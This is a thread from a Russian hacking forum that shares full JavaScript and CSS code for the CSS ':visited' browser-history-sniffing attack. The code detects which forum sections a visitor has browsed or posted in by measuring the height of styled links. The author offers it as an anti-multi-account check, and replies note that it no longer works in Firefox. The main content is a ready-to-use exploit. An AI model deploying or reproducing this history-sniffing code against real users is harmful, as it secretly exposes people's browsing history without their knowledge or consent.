Этому методу уже 5 лет и наверное многие его знают, но на форуме я не нашел ни одной темы о нем. Метод основан на отличии внешнего вида посещенных ссылок от непосещенных в большинстве браузеров. Это позволяет с помощью JS узнать, какие сайты посещал пользователь. Следующий код проверяет, в какие разделы на ачате заходил посетитель сайта и в каких создавал темы. PHP: <html> <body> <style type="text/css">#x a:visited{height:1px;width:1px;display:block;overflow:hidden;margin:1px;}</style> <script> var domains = new Array( 'http://forum.antichat.ru/', 'https://forum.antichat.ru/', 'http://forum.antichat.net/', 'https://forum.antichat.net/' ); var forums = new Array(); forums[0] = new Array( '---', '---', '---', '---', '---', 'ИНФО', 'Level 7', '---', '---', 'Чаты', '---', '---', 'ICQ', 'E-Mail', '---', 'Форумы', '---', '---', '---', 'АнтиАдмин', 'Электроника и Фрикинг', 'Video.Antichat', 'Мировые новости. Обсуждения.', 'С/С++, C#, Delphi, .NET, Asm', '---', '---', '---', '---', '---', 'Статьи', 'Авторские статьи', 'Чужие Статьи', '---', '---', 'Оффтоп', '---', 'PHP, PERL, MySQL, JavaScript', 'Обсуждение Ваших сайтов', 'Модераторский (Level 7)', 'ICQ - Покупка, продажа', 'Безопасность', 'Windows', '*nix', 'Просьбы о взломах', '---', 'Болталка', 'Soft - Windows', 'Soft - *nix', 'Antichat\'s Quest', '---', '---', 'Разное - Покупка, продажа, обмен', '---', '---', '---', '---', 'О Работе', 'Новости мира "железа"', 'Сотовый фрикинг', '"Железо"', 'Схемы, программы, прошивки', '---', 'Телефония и связь', '---', '---', 'Жалобы и предложения', 'Правила форума', '---', '---', '---', '---', 'Forum for discussion of ANTICHAT', '---', 'Уязвимости', '---', 'Криптография, расшифровка хешей', '---', '---', '---', 'Защита ОС: вирусы, антивирусы, файрволы.', 'Анонимность', '---', '---', '---', '---', '---', '---', '---', 'Избранное', '---', '---', 'ПО для Web разработчика', '---', 'Реверсинг', '---', '---', 'Antichat', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', 'Программирование', 'Проверка на уязвимости', 'Безопасность и Уязвимости', 'Квесты', 'Беспроводные технологии/WPAN/WLAN', 'Сценарии/CMF/СMS', 'SЕО/Финансовые задачи/Социальные сети', 'SЕО - тонкости, методы раскрутки', 'Белые методы раскрутки', 'Черные методы раскрутки', 'Статьи', '---', '---', 'Новости форума', 'Администрирование', '*nix системы', 'Windows системы', '---', 'Партнерки', 'Level 6', 'Уязвимости (Level 6)', 'Релизы (Level 6)', '---', '---', 'Социальные сети', 'Социальные сети', '---', '---', '---', '---', '---', 'AntiDDos - АнтиДДОС', 'Услуги, Покупка и Продажа в SEO', 'Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.', '---', 'Задания (Level 6)', 'Хостинги - Hostings', 'Покупка, Продажа, Обмен', 'VPN, Proxy, Socks - Покупка, продажа', 'Хостинг, Dedicated, VDS, Сервера - Покупка, продажа', 'Инвайты, mails, базы - Покупка, продажа', 'Мобильная связь, СМС - Покупка, продажа', 'Трафик, лоады, инсталлы, загрузки - Покупка, продажа', 'Доступы, shells, ftp - Покупка, продажа', 'Заявки на модерирование (Level 7)', 'Закрытые заявки на модерирование (Level 7)', 'Видео-Конкурс [лето 2010]', 'Новогодний Видео-Конкурс [2011]', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---', '---' ); forums[1] = new Array(); forums[2] = new Array(); var newDiv = document.createElement('div'); newDiv.id='x'; document.body.appendChild(newDiv); for(var i = 0; i < 200; i++) { for(var j = 0; j < 4; j++) { var newA = document.createElement('a'); newA.href = domains[j] + "forum" + (i + 1) + '.html'; newDiv.appendChild(newA); if(newA.offsetHeight == 1) { forums[1][i] = true; newDiv.removeChild(newA); break; } newDiv.removeChild(newA); } for(var j = 0; j < 4; j++) { var newA = document.createElement('a'); newA.href = domains[j] + "newthread.php?do=newthread&f=" + (i + 1); newDiv.appendChild(newA); if(newA.offsetHeight == 1) { forums[2][i] = true; newDiv.removeChild(newA); break; } newDiv.removeChild(newA); } } document.write('Вы посещали разделы:<br>'); for(var i = 0; i < 200; i++) { if(forums[1][i] == true) { document.write( '<a href="http://forum.antichat.ru/forum' + (i + 1) + '.html">' + forums[0][i] + '</a><br>'); } } document.write('<br>Вы создавали темы в разделах:<br>'); for(var i = 0; i < 200; i++) { if(forums[2][i] == true) { document.write( '<a href="http://forum.antichat.ru/forum' + (i + 1) + '.html">' + forums[0][i] + '</a><br>'); } } </script> </body> </html> Пример - http://mscript.biz/csshistory/ Метод может быть использован, как дополнительная защита от мультиаккаунтов, если при регистрации проверять, посещал ли человек страницы, доступные только зарегистрированным пользователям, например: /usercp.php? /private.php? /myip.php /forum66.html /newthread.php?do=newthread&f=[1-200]
Искал через гугл: history hack site:antichat.ru css hack site:antichat.ru javascript история браузера site:antichat.ru javascript history браузера site:antichat.ru Единственное, что нашел - StartPanic пугает "взломом" истории браузера в мировых новостях.
На ачате мало сильно знающих эту технику так, как знаешь ее ты! обычные пасивки, активки и не болие того. хотя сама эта уязвимость дает большие перспективы! есть мысли но после того как появится время, это все протестировать...
пробовал в FF, не работает. Поискал решение, говорят теперь в браузерах стоит запрет на изменение размера шрифта в классе посещенных ссылок. Мол им, теперь, только цвет текста и фона менять можно...
